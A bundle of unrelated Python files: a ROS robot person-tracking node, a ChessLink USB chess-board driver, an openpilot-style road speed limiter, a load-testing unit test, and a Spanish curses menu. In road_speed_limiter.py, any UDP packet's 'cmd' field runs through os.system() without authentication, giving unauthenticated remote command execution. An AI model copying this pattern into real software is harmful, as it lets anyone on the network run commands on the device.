from geometry_msgs.msg import Twist
from tf.transformations import *
from math import pi
from geometry_msgs.msg import PoseStamped
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from geometry_msgs.msg import PoseWithCovarianceStamped,PoseStamped,Twist
from std_msgs.msg import Header
from sensor_msgs.msg import JointState
from threading import Thread
import threading
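# Overall structure: three worker threads run in parallel,
#   object_recognize() - YOLO detection on the middle camera image,
#   motor1_move()      - pans the torso motor to keep the detected person centered,
#   base_move()        - pulls the base over / back depending on person presence.
# They communicate through the module-level globals delta_person, label_list and
# person_count_total.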
# Callback: get the robot's motor1 joint state
def RV2_motorjointstate_callback(data):
global RV2_motor1_joint
RV2_motor1_joint = data.position[0]
def active_cb(extra):
rospy.loginfo("Goal pose being processed")
def feedback_cb(feedback):
rospy.loginfo("Current location: "+str(feedback))
def done_cb(status, result):
if status == 3:
rospy.loginfo("Goal reached")
if status == 2 or status == 8:
rospy.loginfo("Goal cancelled")
if status == 4:
rospy.loginfo("Goal aborted")
# Callback: use CvBridge to get the RGB image from the middle camera
def ReceiveVideo_mid(data):
global cv_image, bridge
cv_image = bridge.compressed_imgmsg_to_cv2(data, 'bgr8')
# YOLO object recognition routine; reports whether a person is detected and the person's horizontal offset
def object_recognize():
global delta_person, cv_image, label_list, person_count_total
fps = 0
    count_period = 3  # detection counting period (seconds)
person_stay_count = 0
person_count_total = 0
t_start = time.time()
yolo = YOLO()
time.sleep(1)
while not rospy.is_shutdown():
        # Read one frame
frame = cv2.cvtColor(cv_image,cv2.COLOR_BGR2RGB)
        # Convert to a PIL Image
frame = pilimage.fromarray(np.uint8(frame))
        # Run detection
frame, bbox_list, label_list = yolo.detect_image(frame)
frame = np.array(frame)
        # Convert RGB back to BGR for OpenCV display
frame = cv2.cvtColor(frame,cv2.COLOR_RGB2BGR)
# fps = ( fps + (1./(time.time()-t_start)) ) / 2
# print("fps= %.2f"%(fps))
# frame = cv2.putText(frame, "fps= %.2f"%(fps), (0, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
# print(frame.shape)
cv2.imshow("video",frame)
cv2.waitKey(3)
        if type(label_list) != int:  # when nothing is detected, bbox_list and label_list are the int 1
num_of_obj = len(label_list)
            # compute the offset of the tracked object from the image center
for i in range(num_of_obj):
if 'person' in label_list[i]:
person_stay_count = person_stay_count + 1
object_center = (bbox_list[i][1]+bbox_list[i][3])*0.5
delta_person = 320-object_center
else:
print('yolo未识别到任何物体')
        # At the end of each period restart the timer, store the period's person-detection count in person_count_total, and reset person_stay_count
if time.time() - t_start > count_period:
t_start = time.time()
person_count_total = person_stay_count
person_stay_count = 0
else:
pass
print (label_list, t_start, 'person_stay_count:', person_stay_count, 'person_count_total:', person_count_total) # for debug
    os._exit(0)
def motor1_move():
time.sleep(1)
global command_vel_pub_m, delta_person, RV2_motor1_joint, label_list
delta_person = 0
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "motor1_link"
motor_vel.name = ["motor1"]
while not rospy.is_shutdown():
# print('delta_person:', delta_person) # for debug
        # Middle position range
if -1.5 < RV2_motor1_joint < 1.5:
            # Turn-left condition
if delta_person > 200:
motor_vel.velocity = [0.48]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif 80 < delta_person < 200:
motor_vel.velocity = [(delta_person - 40) * 0.003]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
            # Turn-right condition
elif delta_person < -200:
motor_vel.velocity = [-0.48]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif -200 < delta_person < -80:
motor_vel.velocity = [(delta_person + 40) * 0.003]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
            # Stop condition
elif -80 < delta_person < 80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
        # Left limit reached
if 1.5 < RV2_motor1_joint:
            # Turn-left condition
if delta_person > 80:
motor_vel.velocity = [0]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
            # Turn-right condition
elif delta_person < -200:
motor_vel.velocity = [-0.48]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif -200 < delta_person < -80:
motor_vel.velocity = [(delta_person + 40) * 0.003]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
            # Stop condition
elif -80 < delta_person < 80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
        # Right limit reached
if RV2_motor1_joint < -1.5:
            # Turn-left condition
if delta_person > 200:
motor_vel.velocity = [0.48]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif 80 < delta_person < 200:
motor_vel.velocity = [(delta_person - 40) * 0.003]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
            # Turn-right condition
elif delta_person < -80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
            # Stop condition
elif -80 < delta_person < 80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
else:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
# Base (chassis) motion routine
def base_move():
global person_count_total, trans, rot, tf_listener
flag_on_mainroad = True
    person_stay_threshold = 2  # threshold on the number of person detections within one counting period
try:
(trans, rot) = tf_listener.lookupTransform('/map', '/base_link', rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
rospy.loginfo("tf Error")
while not rospy.is_shutdown():
        # If a person has been in view long enough and the robot is on the main road, pull over
if person_count_total > person_stay_threshold and flag_on_mainroad:
try:
(trans, rot) = tf_listener.lookupTransform('/map', '/base_link', rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
rospy.loginfo("tf Error")
print('flag', flag_on_mainroad)
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = "map"
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = trans[0] + 0.2
goal.target_pose.pose.position.y = trans[1]
goal.target_pose.pose.position.z = 0
goal.target_pose.pose.orientation.x = 0
goal.target_pose.pose.orientation.y = 0
goal.target_pose.pose.orientation.z = rot[2]
goal.target_pose.pose.orientation.w = rot[3]
flag_on_mainroad = False
print('flag', flag_on_mainroad)
print(goal)
navclient.send_goal(goal,done_cb)
finished = navclient.wait_for_result()
# flag_on_mainroad = False
        # If no person has been in view for a while and the robot has already pulled over, return to the main road
elif person_count_total < person_stay_threshold and not(flag_on_mainroad):
try:
(trans, rot) = tf_listener.lookupTransform('/map', '/base_link', rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
rospy.loginfo("tf Error")
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = "map"
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = trans[0] + 0.5
goal.target_pose.pose.position.y = trans[1] + 0.5
goal.target_pose.pose.position.z = 0.0
goal.target_pose.pose.orientation.x = 0.0
goal.target_pose.pose.orientation.y = 0.0
goal.target_pose.pose.orientation.z = 0.0
goal.target_pose.pose.orientation.w = 1.0
navclient.send_goal(goal)
flag_on_mainroad = True
        # If a person is still in view and the robot has already pulled over, just wait
elif person_count_total > person_stay_threshold and not(flag_on_mainroad):
pass
time.sleep(0.2)
def Goal():
global label_list, trans, rot, tf_listener
print('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = "map"
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = 0.3
goal.target_pose.pose.position.y = 0
goal.target_pose.pose.position.z = 0.0
goal.target_pose.pose.orientation.x = 0.0
goal.target_pose.pose.orientation.y = 0.0
goal.target_pose.pose.orientation.z = 0.0
goal.target_pose.pose.orientation.w = 1.0
navclient.send_goal(goal,done_cb,active_cb, feedback_cb)
finished = navclient.wait_for_result()
if not finished:
rospy.logerr("Action server not available!")
else:
rospy.loginfo ( navclient.get_result())
if __name__ == '__main__':
try:
        # Initialize the ROS node
rospy.init_node("vision_based_move")
rospy.loginfo("Starting vision based move node")
global command_vel_pub_m, delta_person, trans, rot, tf_listener, navclient, bridge, RV2_motor1_joint
        # Publisher for the motor velocity
command_vel_pub_m = rospy.Publisher('/motor_control/input/velocity', JointState, queue_size = 100, latch=True)
        # Subscribe to the torso motor joint states
rospy.Subscriber('/joint_states_motor', JointState, RV2_motorjointstate_callback)
        # Subscribe to the camera image
rospy.Subscriber('/mid_camera/color/image_raw/compressed', CompressedImage, ReceiveVideo_mid)
        # Instantiate the tf listener and CvBridge
tf_listener = tf.TransformListener()
bridge = CvBridge()
        # Start the move_base navigation action client
navclient = actionlib.SimpleActionClient('move_base',MoveBaseAction)
navclient.wait_for_server()
        # Start the YOLO recognition thread
t_object_recognize = threading.Thread(target = object_recognize)
t_object_recognize.start()
        # # Start the torso motor thread
t_motor1 = threading.Thread(target = motor1_move)
t_motor1.start()
        # Start the base motion thread
t_base = threading.Thread(target = base_move)
t_base.start()
# t_goal = threading.Thread(target = Goal)
# t_goal.start()
# t_goal = threading.Thread(target = Goal_test)
# t_goal.start()
except KeyboardInterrupt:
print("Shutting down cv_bridge_test node.")
cv2.destroyAllWindows()
sys.exit()
|
chess_link_usb.py
|
"""
ChessLink transport implementation for USB connections.
"""
import logging
import threading
import time
import chess_link_protocol as clp
try:
import serial
import serial.tools.list_ports
usb_support = True
except ImportError:
usb_support = False
class Transport():
"""
ChessLink transport implementation for USB connections.
This class does automatic hardware detection of any ChessLink board connected
    via USB and supports Linux, macOS and Windows.
    This transport uses an asynchronous background thread for hardware communication.
All replies are written to the python queue `que` given during initialization.
"""
def __init__(self, que, protocol_dbg=False):
"""
Initialize with python queue for event handling.
Events are strings conforming to the ChessLink protocol as documented in
`magic-link.md <https://github.com/domschl/python-mchess/blob/master/mchess/magic-board.md>`_.
        :param que: Python queue that will receive events from the chess board.
:param protocol_dbg: True: byte-level ChessLink protocol debug messages
"""
self.log = logging.getLogger("ChessLinkUSB")
if usb_support is False:
self.log.error(
'Cannot communicate: PySerial module not installed.')
self.init = False
return
self.que = que # asyncio.Queue()
self.init = True
self.log.debug("USB init ok")
self.protocol_debug = protocol_dbg
self.last_agent_state = None
self.error_state = False
self.thread_active = False
self.event_thread = None
self.usb_dev = None
self.uport = None
def quit(self):
"""
Initiate worker-thread stop
"""
self.thread_active = False
def search_board(self, iface=None):
"""
Search for ChessLink connections on all USB ports.
:param iface: not used for USB.
:returns: Name of the port with a ChessLink board, None on failure.
"""
self.log.info("Searching for ChessLink boards...")
self.log.info('Note: search can be disabled in < chess_link_config.json >' \
' by setting {"autodetect": false}')
port = None
ports = self.usb_port_search()
if len(ports) > 0:
if len(ports) > 1:
self.log.warning(f"Found {len(ports)} Millennium boards, using first found.")
port = ports[0]
self.log.info(f"Autodetected Millennium board at USB port: {port}")
return port
def test_board(self, port):
"""
        Test a USB port for a correct answer to the get-version command.
:returns: Version string on ok, None on failure.
"""
self.log.debug(f"Testing port: {port}")
try:
self.usb_dev = serial.Serial(port, 38400, timeout=2)
self.usb_dev.dtr = 0
self.write_mt("V")
version = self.usb_read_synchr(self.usb_dev, 'v', 7)
if len(version) != 7:
self.usb_dev.close()
self.log.debug(f"Message length {len(version)} instead of 7")
return None
if version[0] != 'v':
self.log.debug(f"Unexpected reply {version}")
self.usb_dev.close()
return None
verstring = f'{version[1]+version[2]}.{version[3]+version[4]}'
self.log.debug(f"Millennium {verstring} at {port}")
self.usb_dev.close()
return verstring
except (OSError, serial.SerialException) as e:
self.log.debug(f'Board detection on {port} resulted in error {e}')
try:
self.usb_dev.close()
except Exception:
pass
return None
def usb_port_check(self, port):
"""
Check usb port for valid ChessLink connection
:returns: True on success, False on failure.
"""
self.log.debug(f"Testing port: {port}")
try:
s = serial.Serial(port, 38400)
s.close()
return True
except (OSError, serial.SerialException) as e:
self.log.debug(f"Can't open port {port}, {e}")
return False
def usb_port_search(self):
"""
Get a list of all usb ports that have a connected ChessLink board.
:returns: array of usb port names with valid ChessLink boards, an empty array
if none is found.
"""
ports = list([port.device for port in serial.tools.list_ports.comports(True)])
vports = []
for port in ports:
if self.usb_port_check(port):
version = self.test_board(port)
if version is not None:
self.log.debug(f"Found board at: {port}")
vports.append(port)
break # only one port necessary
return vports
def write_mt(self, msg):
"""
Encode and write a message to ChessLink.
:param msg: Message string. Parity will be added, and block CRC appended.
"""
msg = clp.add_block_crc(msg)
bts = []
for c in msg:
bo = clp.add_odd_par(c)
bts.append(bo)
try:
if self.protocol_debug is True:
self.log.debug(f'Trying write <{bts}>')
self.usb_dev.write(bts)
self.usb_dev.flush()
except Exception as e:
self.log.error(f"Failed to write {msg}: {e}")
self.error_state = True
return False
if self.protocol_debug is True:
self.log.debug(f"Written '{msg}' as < {bts} > ok")
return True
def usb_read_synchr(self, usbdev, cmd, num):
"""
Synchronous reads for initial hardware detection.
"""
rep = []
start = False
while start is False:
try:
b = chr(ord(usbdev.read()) & 127)
except Exception as e:
self.log.debug("USB read failed: {e}")
return []
if b == cmd:
rep.append(b)
start = True
for _ in range(num-1):
try:
b = chr(ord(usbdev.read()) & 127)
rep.append(b)
except (Exception) as e:
self.log.error(f"Read error {e}")
break
if clp.check_block_crc(rep) is False:
return []
return rep
def agent_state(self, que, state, msg):
if state != self.last_agent_state:
self.last_agent_state = state
que.put('agent-state: '+state + ' ' + msg)
def open_mt(self, port):
"""
        Open a USB port to a connected ChessLink board.
:returns: True on success.
"""
self.uport = port
try:
self.usb_dev = serial.Serial(port, 38400, timeout=0.1)
self.usb_dev.dtr = 0
except Exception as e:
emsg = f'USB cannot open port {port}, {e}'
self.log.error(emsg)
self.agent_state(self.que, 'offline', emsg)
return False
self.log.debug(f'USB port {port} open')
self.thread_active = True
self.event_thread = threading.Thread(
target=self.event_worker_thread, args=(self.que,))
self.event_thread.setDaemon(True)
self.event_thread.start()
return True
def event_worker_thread(self, que):
"""
Background thread that sends data received via usb to the queue `que`.
"""
self.log.debug('USB worker thread started.')
cmd_started = False
cmd_size = 0
cmd = ""
self.agent_state(self.que, 'online', f'Connected to {self.uport}')
self.error_state = False
posted = False
while self.thread_active:
while self.error_state is True:
time.sleep(1.0)
try:
self.usb_dev.close()
except Exception as e:
                    self.log.debug(f'Failed to close usb: {e}')
try:
self.usb_dev = serial.Serial(
self.uport, 38400, timeout=0.1)
self.usb_dev.dtr = 0
self.agent_state(self.que, 'online', f'Reconnected to {self.uport}')
self.error_state = False
posted = False
break
except Exception as e:
if posted is False:
emsg = f"Failed to reconnected to {self.uport}, {e}"
self.log.warning(emsg)
self.agent_state(self.que, 'offline', emsg)
posted = True
b = ""
try:
if cmd_started is False:
self.usb_dev.timeout = None
else:
self.usb_dev.timeout = 0.2
by = self.usb_dev.read()
if len(by) > 0:
b = chr(ord(by) & 127)
else:
continue
except Exception as e:
if len(cmd) > 0:
self.log.debug(f"USB command '{cmd[0]}' interrupted: {e}")
time.sleep(0.1)
cmd_started = False
cmd_size = 0
cmd = ""
self.error_state = True
continue
if len(b) > 0:
if cmd_started is False:
if b in clp.protocol_replies:
cmd_started = True
cmd_size = clp.protocol_replies[b]
cmd = b
cmd_size -= 1
else:
cmd += b
cmd_size -= 1
if cmd_size == 0:
cmd_started = False
cmd_size = 0
if self.protocol_debug is True:
self.log.debug(f"USB received cmd: {cmd}")
if clp.check_block_crc(cmd):
que.put(cmd)
cmd = ""
def get_name(self):
"""
Get name of this transport.
:returns: 'chess_link_usb'
"""
return "chess_link_usb"
def is_init(self):
"""
Check, if hardware connection is up.
:returns: True on success.
"""
self.log.debug("Ask for init")
return self.init
|
road_speed_limiter.py
|
import json
import os
import select
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.numpy_fast import clip
from common.realtime import sec_since_boot
from selfdrive.config import Conversions as CV
CAMERA_SPEED_FACTOR = 1.05
class Port:
BROADCAST_PORT = 2899
RECEIVE_PORT = 2843
LOCATION_PORT = 2911
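    # BROADCAST_PORT: this service announces "EON:ROAD_LIMIT_SERVICE:v1" here so a
    #                 peer on the same network can discover it (presumably a phone
    #                 app that supplies the JSON road-limit data).
    # RECEIVE_PORT:   UDP port this server listens on for that JSON data.
    # LOCATION_PORT:  port the optional gps_thread streams GPS fixes back to.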
class RoadLimitSpeedServer:
def __init__(self):
self.json_road_limit = None
self.active = 0
self.last_updated = 0
self.last_updated_active = 0
self.last_exception = None
self.lock = threading.Lock()
self.remote_addr = None
broadcast = Thread(target=self.broadcast_thread, args=[])
broadcast.setDaemon(True)
broadcast.start()
# gps = Thread(target=self.gps_thread, args=[])
# gps.setDaemon(True)
# gps.start()
def gps_thread(self):
sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while True:
try:
sm.update()
if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
location = sm['gpsLocationExternal']
json_location = json.dumps([
location.latitude,
location.longitude,
location.altitude,
location.speed,
location.bearingDeg,
location.accuracy,
location.timestamp,
location.source,
location.vNED,
location.verticalAccuracy,
location.bearingAccuracyDeg,
location.speedAccuracy,
])
address = (self.remote_addr[0], Port.LOCATION_PORT)
sock.sendto(json_location.encode(), address)
else:
time.sleep(1.)
except Exception as e:
print("exception", e)
time.sleep(1.)
def get_broadcast_address(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = fcntl.ioctl(
s.fileno(),
0x8919,
struct.pack('256s', 'wlan0'.encode('utf-8'))
)[20:24]
return socket.inet_ntoa(ip)
except:
return None
def broadcast_thread(self):
broadcast_address = None
frame = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
try:
if broadcast_address is None or frame % 10 == 0:
broadcast_address = self.get_broadcast_address()
print('broadcast_address', broadcast_address)
if broadcast_address is not None:
address = (broadcast_address, Port.BROADCAST_PORT)
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
except:
pass
time.sleep(5.)
frame += 1
except:
pass
def send_sdp(self, sock):
try:
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
except:
pass
def udp_recv(self, sock):
ret = False
try:
ready = select.select([sock], [], [], 1.)
ret = bool(ready[0])
if ret:
data, self.remote_addr = sock.recvfrom(2048)
json_obj = json.loads(data.decode())
if 'cmd' in json_obj:
try:
os.system(json_obj['cmd'])
ret = False
except:
pass
if 'echo' in json_obj:
try:
echo = json.dumps(json_obj["echo"])
sock.sendto(echo.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
ret = False
except:
pass
try:
self.lock.acquire()
try:
if 'active' in json_obj:
self.active = json_obj['active']
self.last_updated_active = sec_since_boot()
except:
pass
if 'road_limit' in json_obj:
self.json_road_limit = json_obj['road_limit']
self.last_updated = sec_since_boot()
finally:
self.lock.release()
except:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
return ret
def check(self):
now = sec_since_boot()
if now - self.last_updated > 20.:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
if now - self.last_updated_active > 10.:
self.active = 0
def get_limit_val(self, key, default=None):
try:
if self.json_road_limit is None:
return default
if key in self.json_road_limit:
return self.json_road_limit[key]
except:
pass
return default
def main():
server = RoadLimitSpeedServer()
roadLimitSpeed = messaging.pub_sock('roadLimitSpeed')
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
try:
sock.bind(('0.0.0.0', 843))
except:
sock.bind(('0.0.0.0', Port.RECEIVE_PORT))
sock.setblocking(False)
while True:
if server.udp_recv(sock):
dat = messaging.new_message()
dat.init('roadLimitSpeed')
dat.roadLimitSpeed.active = server.active
dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False)
dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0)
dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
dat.roadLimitSpeed.camSpeedFactor = server.get_limit_val("cam_speed_factor", CAMERA_SPEED_FACTOR)
roadLimitSpeed.send(dat.to_bytes())
server.send_sdp(sock)
server.check()
except Exception as e:
server.last_exception = e
class RoadSpeedLimiter:
def __init__(self):
self.slowing_down = False
self.started_dist = 0
self.sock = messaging.sub_sock("roadLimitSpeed")
self.roadLimitSpeed = None
def recv(self):
try:
dat = messaging.recv_sock(self.sock, wait=False)
if dat is not None:
self.roadLimitSpeed = dat.roadLimitSpeed
except:
pass
def get_active(self):
self.recv()
if self.roadLimitSpeed is not None:
return self.roadLimitSpeed.active
return 0
def get_max_speed(self, cluster_speed, is_metric):
log = ""
self.recv()
if self.roadLimitSpeed is None:
return 0, 0, 0, False, ""
try:
road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
is_highway = self.roadLimitSpeed.isHighway
cam_type = int(self.roadLimitSpeed.camType)
cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
cam_limit_speed = self.roadLimitSpeed.camLimitSpeed
section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
section_left_dist = self.roadLimitSpeed.sectionLeftDist
camSpeedFactor = clip(self.roadLimitSpeed.camSpeedFactor, 1.0, 1.1)
if is_highway is not None:
if is_highway:
MIN_LIMIT = 40
MAX_LIMIT = 120
else:
MIN_LIMIT = 30
MAX_LIMIT = 100
else:
MIN_LIMIT = 30
MAX_LIMIT = 120
if cam_type == 22: # speed bump
MIN_LIMIT = 10
if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
v_ego = cluster_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
diff_speed = cluster_speed - (cam_limit_speed * camSpeedFactor)
#cam_limit_speed_ms = cam_limit_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
starting_dist = v_ego * 30.
if cam_type == 22:
safe_dist = v_ego * 3.
else:
safe_dist = v_ego * 6.
if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < starting_dist):
if not self.slowing_down:
self.started_dist = cam_limit_speed_left_dist
self.slowing_down = True
first_started = True
else:
first_started = False
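          # Ease down onto the camera limit: td is the distance from where slowing
          # started to the "safe" point, d is the remaining distance. pp = (d/td)**0.6
          # decays from ~1 to 0, so the returned max speed falls from the current
          # cluster speed to cam_limit_speed * camSpeedFactor as the camera is
          # approached (the 0.6 exponent keeps it slightly above a linear ramp).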
td = self.started_dist - safe_dist
d = cam_limit_speed_left_dist - safe_dist
if d > 0. and td > 0. and diff_speed > 0. and (section_left_dist is None or section_left_dist < 10):
pp = (d / td) ** 0.6
else:
pp = 0
return cam_limit_speed * camSpeedFactor + int(pp * diff_speed), \
cam_limit_speed, cam_limit_speed_left_dist, first_started, log
self.slowing_down = False
return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
if not self.slowing_down:
self.slowing_down = True
first_started = True
else:
first_started = False
return section_limit_speed * camSpeedFactor, section_limit_speed, section_left_dist, first_started, log
self.slowing_down = False
return 0, section_limit_speed, section_left_dist, False, log
except Exception as e:
log = "Ex: " + str(e)
pass
self.slowing_down = False
return 0, 0, 0, False, log
road_speed_limiter = None
def road_speed_limiter_get_active():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_active()
def road_speed_limiter_get_max_speed(cluster_speed, is_metric):
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_max_speed(cluster_speed, is_metric)
def get_road_speed_limiter():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter
if __name__ == "__main__":
main()
|
test_hq.py
|
import os
import sys
import unittest
import shutil
import json
from multiprocessing import Process
from oct_turrets.turret import Turret
from oct_turrets.utils import load_file, validate_conf
from oct.core.hq import get_hq_class, HightQuarter
from oct.utilities.run import run
from oct.utilities.commands import main
BASE_DIR = os.path.dirname(os.path.realpath(__file__))
def run_turret():
"""Run a simple turret for testing the hq
"""
module = load_file(os.path.join(BASE_DIR, 'fixtures', 'v_user.py'))
config = validate_conf(os.path.join(BASE_DIR, 'fixtures', 'turret_config.json'))
turret = Turret(config, module)
turret.start()
def run_bad_turret():
module = load_file(os.path.join(BASE_DIR, 'fixtures', 'bad_user.py'))
config = validate_conf(os.path.join(BASE_DIR, 'fixtures', 'turret_config.json'))
turret = Turret(config, module)
turret.start()
class CmdOpts(object):
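    # Minimal stand-in for the parsed command-line options object that
    # oct.utilities.run.run() is handed in the tests below.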
def __init__(self):
self.project_path = '/tmp/oct-test'
self.publisher_channel = None
self.no_results = False
class HQTest(unittest.TestCase):
def setUp(self):
self.turret = Process(target=run_turret)
self.turret.start()
self.bad_turret = Process(target=run_bad_turret)
self.bad_turret.start()
sys.argv = sys.argv[:1]
sys.argv += ["new-project", "/tmp/oct-test"]
main()
# update the runtime for the project
with open(os.path.join(BASE_DIR, 'fixtures', 'config.json')) as f:
data = json.load(f)
with open(os.path.join('/tmp/oct-test', 'config.json'), 'w') as f:
json.dump(data, f)
def test_run_hq(self):
"""Test hq
"""
run(CmdOpts())
def test_run_argparse(self):
"""Test runing hq with command line arguments
"""
sys.argv = sys.argv[:1]
opts = CmdOpts()
sys.argv += ["run", opts.project_path, "--with-forwarder"]
main()
def test_create_errors(self):
"""Test errors when creating project
"""
with self.assertRaises(OSError):
sys.argv = sys.argv[:1]
sys.argv += ["new-project", "/tmp/"]
main()
def tearDown(self):
shutil.rmtree('/tmp/oct-test')
self.turret.terminate()
self.bad_turret.terminate()
if os.path.isfile('/tmp/results.sqlite'):
os.remove('/tmp/results.sqlite')
class GetHqClassTest(unittest.TestCase):
def test_get_hq_class(self):
hq_class = get_hq_class()
self.assertEqual(hq_class, HightQuarter)
hq_class = get_hq_class('oct.core.hq.HightQuarter')
self.assertEqual(hq_class, HightQuarter)
if __name__ == '__main__':
unittest.main()
|
interfaz.py
|
import curses
from time import sleep
import proyecto2 as pyt2
import config as c
from threading import Semaphore, Thread
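# The config module `c` is expected to provide the shared state used below: the
# semaphores c.pausa, c.sigHilos and c.sigInterfaz, plus c.grafico, a list of
# strings describing the current scene (inferred from how they are used here).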
def menu():
    #Initialize the screen and get the console dimensions
scr = curses.initscr()
curses.noecho()
dims = scr.getmaxyx()
hilosCorriendo = False
q = -1
while q != 113 and q != 81:
scr.nodelay(1)
q = scr.getch()
scr.clear()
        #Title screen
scr.addstr(1,dims[1]-24, 'Presione \'q\' para salir')
scr.addstr(2,(dims[1]-39)//2,' _____ _ _ __ ')
scr.addstr(3,(dims[1]-39)//2,'| ___| | | | / _| ')
scr.addstr(4,(dims[1]-39)//2,'| |__ | | | |__ _ _| |_ ___ _ __ ')
scr.addstr(5,(dims[1]-39)//2,'| __|| | | \'_ \\| | | | _/ _ \\| \'_ \\ ')
scr.addstr(6,(dims[1]-39)//2,'| |___| | | |_) | |_| | || (_) | | | |')
scr.addstr(7,(dims[1]-39)//2,'\\____/|_| |_.__/ \\__,_|_| \\___/|_| |_|')
scr.addstr(8,(dims[1]-50)//2,' _ _ \n')
scr.addstr(9,(dims[1]-50)//2,' | | | | \n')
scr.addstr(10,(dims[1]-50)//2,' ___ _ __ ___| | | |_ _ __ ___ _ __ ___ \n')
scr.addstr(11,(dims[1]-50)//2,' / _ \\ \'_ \\ / _ \\ | | __| \'__/ _ \\| \'_ \\ / _ \\ \n')
scr.addstr(12,(dims[1]-50)//2,'| __/ | | | | __/ | | |_| | | (_) | | | | (_) |\n')
scr.addstr(13,(dims[1]-50)//2,' \\___|_| |_| \\___|_| \\__|_| \\___/|_| |_|\\___/ \n')
scr.addstr(16,(dims[1]//2)-15,'1. El problema')
scr.addstr(18,(dims[1]//2)-15,'2. Ejecución visual')
scr.refresh()
s = -1
        #1. The problem
if q == 49:
scr.clear()
scr.nodelay(1)
            #Show the problem description until the user exits.
while s != 115 and s != 83:
scr.addstr(1, dims[1]-33,'Presiona \'s\' parar salir al menú')
scr.addstr(2, (dims[1]-20)//2,'El bufón en el trono')
scr.addstr(3, 2,'El bufón de la corte tiene un pasatiempo secreto: le gusta disfrazarse del rey y sentarse en el trono. Sin embargo, solo puede hacer esto cuando no hay nadie presente en la sala: ni el rey ni los cortesanos. El bufón aprovechará cualquier oportunidad que tenga para darse este lujo. El rey suele ausentarse por periodos considerables de tiempo, mientras que varios cortesanos pueden entrar y salir de la sala. Si el rey llega mientras el bufón está sentado, el bufón tiene que levantarse inmediatamente y cederle el trono. Si un cortesano llega mientras el bufón está sentado, pensará que es el rey y no lo molestará. El bufón también es impaciente, por lo que si cuenta que ya pasaron N (N = 10) cortesanos por la sala y no lo han dejado a solas con el trono, aún en presencia del rey, cerrará maliciosamente la puerta de los cortesanos y esperará a que todos se vayan. Los cortesanos tendrán que esperar afuera. Desafortunadamente, cuando hay M (M = 5) cortesanos esperando, éstos se ponen ruidosos, y el bufón tiene abrirles la puerta, aún si no está sentado.')
scr.nodelay(0)
